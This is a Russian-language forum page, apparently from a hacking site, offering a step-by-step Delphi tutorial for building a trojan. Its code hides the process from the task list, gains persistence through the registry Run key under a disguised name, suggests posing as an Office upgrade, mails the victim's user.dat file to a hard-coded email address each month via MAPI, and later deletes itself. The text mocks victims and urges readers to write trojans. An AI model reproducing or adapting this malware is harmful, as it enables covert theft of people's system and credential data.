|
| Статистика |
|
Всего на сайте: 1 Гостей: 1 Пользователей: 0 |
|
|
|
 | |  |
|
Троян
Трояны, трояны, трояны... писать их на самом деле довольно просто, если, конечно, знать точно, что писать :-). Поэтому сначала нужно разработать концепцию, схему, план действий, по которому будет действовать троян и тот, кто им воспользуется :-). Напишем простенький троянчик, который при попадании на компьютер поселится в виде баггла (в шотландском народном фольклоре - это маленькое существо, помогающее человеку по дому, то есть что-то вроде нашего домового) и будет, например, каждый месяц исправно посылать емыльной почтой файл user.dat. (реализацию для %user%.pwl я оставляю на рассмотрение читателю - переделать/дописать будет несложно). Пусть, для определенности и нашего спокойствия, он тихо и незаметно удалится с машины несчастного LMD, скажем, через пару-тройку месяцев работы (то есть пары-тройки "рассылок почты") :-).
Писать я буду на Delphi, так как это практически самый простой и доступный язык для начинающего кодера. Да и для простого человека, имеющего достаточный опыт работы с компом, все здесь будет довольно прозрачно для понимания.
Схватки, бред, потеря сознания
Первым делом... нет, не самолеты :-). Первым делом прибить все окна свежесозданного (с помощью File|New Application) проекта в Delphi, включая главную форму. Проект прибивать не нужно :-). Чтобы поглядеть, что еще осталось, можно ткнуть "серым существом с длинным хвостом" в View|Project Source. Приблизительно это будет выглядеть так:
program Project1;
uses
Forms;
{$R *.RES}
begin
Application.Initialize;
Application.Run;
end.
Все, что касается Application, можно удалить - троян должен вести себя тихо, а потому всякие всплывающие окна и кнопки в панели задач нам не нужны. Нужно удалить также и строчку {$R *.RES}, чтобы не тянуть с собой ненужные иконки и прочую лабуду, так усердно навешиваемую Дельфей. Forms тоже удаляем, поскольку форм у нас не осталось :-). Но (!) нужно будет подключить пару-тройку других модулей, которые действительно будут задействованы:
uses
Windows, // здесь описаны почти все документированные сообщения и
// библиотечные функции виндовза
Registry, // это модуль для работы с системным реестром
Mapi, // а это - чтобы отправлять и принимать сообщения по почте
// и не только. Но нас интересует только отправка ;-)
SysUtils; // вспомогательная библиотека - полезные функции для работы
// со строками и датой/временем.
Появилась головка
Прежде чем приступить собственно к созданию рассылки :-), нужно убедиться, что все будет происходить совершенно незаметно. Естественно, что мигание лампочек на панели модема не спрячешь, но в остальном все можно провернуть без шума и пыли. В панели задач троян не засветится, потому что у него нет главного окна и, соответственно, некуда переключать фокус. А вот по ctrl+alt+del, то есть в списке всех задач, он будет светиться - да еще как! Но эту проблему можно решить просто - достаточно прикинуться невинным скринсавером, чтобы виндовза не показывала его в этом списке. Для этого необходимо воспользоваться специальной функцией RegisterServiceProcess. К сожалению, эту функцию не описывают в стандартных модулях Delphi, поэтому придется описать ее самостоятельно и создать соответствующую процедуру вызова:
procedure RegisterServiceProcess; external 'kernel32.dll' name 'RegisterServiceProcess';
procedure Hide; assembler;
asm
push 1
push 0
call RegisterServiceProcess;
end;
Вышел. Живой. Подал голос.
Представим себе, что троян уже на машине бедного несчастного (людям со слабой нервной системой дальше не читать) ;-) ламера. Первым делом он его запускает (а он, например, что-нибудь в ответ показывает или делает вид, что он - новый супер-пупер апгрейд к офису-2000) и... а дальше троян должен что-то предпринять, чтобы он запускался после каждой перезагрузки машины. Можно, конечно, добавить трояна в папку Автозагрузка, но это ж сразу в глаза бросится - и конечно, есть способ лучше! На наше счастье, программисты виндовзы спроектировали систему очень удобно с точки зрения троянописателей - в системном реестре существуют специальные разделы, посвященные спискам программ, которые должны запускать до старта основных модулей системы, после них и вместо них.
Воспользуемся объектом TRegistry для этих целей:
Reg:=TRegistry.Create;
with Reg do
begin
if OpenKey('SOFTWAREMicrosoftWindowsCurrentVersionRun', True) then
begin
Str:=ReadString('ExplorerService');
if Str <> ParamStr(0) then WriteString('ExplorerService', ParamStr(0));
CloseKey;
OpenKey('SOFTWAREmmuser', True);
try
if StrToDate(ReadString('DateResolve')) > Now then
begin
Send:=True;
WriteString('DateResolve', DateToStr(Now+30));
end
else
Send:=False;
if StrToDate(ReadString('DateExpiration')) <= Now then
Xapakipi:=True
else
Xapakipi:=False;
except
WriteString('DateResolve', DateToStr(Now));
WriteString('DateExpiration', DateToStr(Now+121));
end;
CloseKey;
end;
Из листинга видно, что для запуска себя после рестарта виндовза достаточно прописать путь к себе, любимому, в HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun. В него прописываем ключ с произвольным именем и содержанием = "путь_к_трояну". Попутно в первый раз дописываем свои параметры DateResolve, чтобы в следующий раз знать, когда нужно отсылать файлы.
Кроме DateResolve запишем и DateExpiration - дату, после которой нужно будет просто вырубиться, прибив свою тушку перед этим. Но как это сделать, если виндовз не дает доступа (удалять и перезаписывать) к файлу, из которого запущен? Можно сильно извращаться с разными параметрами или создавать BATники, но в данном случае гораздо проще сделать так:
if Xapakipi then
begin
RootKey:=HKEY_LOCAL_MACHINE;
OpenKey('SOFTWAREMicrosoftWindowsCurrentVersionRunOnce', True);
WriteString('LMD', 'del "'+ParamStr(0)+'"');
Send:=False;
end;
end;
Reg.Free;
То есть просто прописать удаление собственного файла в RunOnce - после выполнения строчка будет удалена системой автоматически. И все - юзер может даже и не узнать никогда, почему у него оказалось на пару-тройку часиков Инета меньше, чем положено.
Чтобы лишний раз не светиться (юзер умный нынче пошел :-P), можно быстренько закругляться, если ничего посылать не нужно:
if not Send then Exit;
Папаша, принимайте дитё!
Настала очередь и для отсылки user.dat. Первым делом его надо найти - я не шучу. Не у всех юзеров виндовза поставлена в C:WINDOWS. Некоторые выпендриваются и ставят ось, например, в какой-нибудь F:MUSTDIE). Но это уже непосредственно после того, как получим доступ к почтовым службам. Поэтому сначала определимся: есть ли доступ? Для этого служит функция из Win32API MAPILogon. Если все в порядке, она возвращает ноль. И тогда наступает время генерировать почтовое сообщение и аттачить к нему филе. Подробнее об этом можно почитать в любой книжке по Win32 API. Скажу лишь, что для создания сообщения требуется заполнить структуру MAPIMessage и соответствующие подструктуры MAPIRecipDesc (получатели) и MAPIFileDesc (аттачи). Как видно из исходника, адрес получателя указывается в lpRecips->lpszAddress.
repeat
if MAPILogon(0, nil, nil, 0, 0, @Handle) = 0 then
try
ZeroMemory(@Msg, sizeof(Msg));
with Msg do
begin
lpszNoteText:='message delivery. notification system v.01 |';
lpszSubject:=nil;
nRecipCount:=1;
GetMem(lpRecips, sizeof(TMapiRecipDesc));
ZeroMemory(lpRecips, sizeof(TMapiRecipDesc));
with lpRecips^ do
begin
ulRecipClass:=MAPI_TO;
lpszName:='Xakep';
lpszAddress:='SMTP:konung@ic.ru';
end;
nFileCount:=1;
GetMem(lpFiles, sizeof(TMapiFileDesc));
ZeroMemory(lpFiles, sizeof(TMapiFileDesc));
with lpFiles^ do
begin
GetMem(lpszPathName, 144);
GetWindowsDirectory(lpszPathName, 144);
StrCat(lpszPathName, 'user.dat');
nPosition:=StrLen(lpszNoteText)-4;
end;
MAPISendMail(Handle, 0, Msg, 0, 0);
FreeMem(lpRecips, sizeof(TMapiRecipDesc));
FreeMem(lpFiles^.lpszPathName, 144);
FreeMem(lpFiles, sizeof(TMapiFileDesc));
end;
finally
MAPILogoff(Handle, 0, 0, 0);
Exit;
end;
Sleep(3*60*1000);
until False;
Все. Осталось дожидаться пока юзер прилогинится к своему провайдеру и зайдет в Сеть. Sleep(3*60*1000) - ждем три минуты и потом пытаемся постучаться в дверь снова - не стоит перегружать компьютер ненужной работой, а то сразу станет заметно присутствие посторонних. После того как сообщение отослано, троян быстренько сворачивает свою бурную деятельность. В-)
Вперед, сыны Трои! Дерзайте! В-)
|
| Категория: Вирусы и вирусология | Добавил: soneradmin (28.12.2008)
|
| Просмотров: 1698
| Рейтинг: 0.0/0 |
Добавлять комментарии могут только зарегистрированные пользователи. [ Регистрация | Вход ] | |
 | |  |
|
|
Всего зарегистрировано: 11152
Главная 
